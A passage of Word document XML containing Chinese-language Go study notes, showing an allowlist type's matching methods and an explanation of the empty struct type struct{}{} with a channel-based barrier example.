      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>StopWords []string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341445A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7F69B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EC5DD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// CommitAllowed returns true if the commit is allowed to be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8F085" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (a *Allowlist) CommitAllowed(c string) bool {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D90226A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if c == "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D851F57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6710167C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B70A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, commit := range a.Commits {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565CCBAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if commit == c {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE50A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77685E2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F19978" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4499888E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51188215" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344338F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EC632D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// PathAllowed returns true if the path is allowed to be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A55EDC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (a *Allowlist) PathAllowed(path string) bool {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734E986" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return anyRegexMatch(path, a.Paths)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF9E15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9074C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02DBE3E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// RegexAllowed returns true if the regex is allowed to be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C231CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (a *Allowlist) RegexAllowed(s string) bool {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCE04F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return anyRegexMatch(s, a.Regexes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3623F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DCE4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B08CFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (a *Allowlist) ContainsStopWord(s string) bool {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201D62C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>s = strings.ToLower(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226283B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, stopWord := range a.StopWords {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386307A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if strings.Contains(s, strings.ToLower(stopWord)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28554C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085D2C17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79711BE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348A446" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2B0D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D66C9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A11AB56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E6D617" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="304" w:name="_Toc159779763"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struct{}{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：一个空类型的实例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="304"/>
    </w:p>
    <w:p w14:paraId="0CAFEDA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://learnku.com/articles/59899</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CC31C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A15DFCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>struct {}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>这是一个类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74372152" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">struct {} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>是一个无元素的结构体类型，通常在没有信息存储时使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020637EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>优点：不需要内存来存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> struct {} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>类型的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439C8A17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>struct{}{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676A6C06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">struct {}{} </w:t>
      </w:r>
      <w:r>
        <w:t>是一个复合字面量，它构造了一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct {} </w:t>
      </w:r>
      <w:r>
        <w:t>类型的值，该值也是空。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF0096" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> structt {}{} </w:t>
      </w:r>
      <w:r>
        <w:t>地址相等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52867599" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5A5935" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如有人写简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收，示例如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D0BF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type barrier struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FCD2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    chCount chan struct{} // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wait()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的先通过这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻塞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F3321" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    count   int           // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记住数量，阻塞超过这个量就可以激活所有协程了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68695586" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C02DC09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照上面的定义，构造函数就可以这么写了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFFD65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func NewBarrier(n int) Barrier {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5468C10A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    b := &amp;barrier{count: n, chCount: make(chan struct{}))}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C2830F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2ABBE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// Wait()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以先写成这样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38776483" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (b *barrier) Wait() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5757B607" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    b.chCount &lt;- struct{}{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF0C79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBE674F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668E0402" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713CB769" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他的示例代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41552C8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B35B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68065F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type idBval struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9252F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Id int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4382A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B9705" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAD8D16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A388B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    idA := struct{}{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06280524" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    fmt.Printf("idA: %T and %v \n\n", idA, idA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4859E4FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
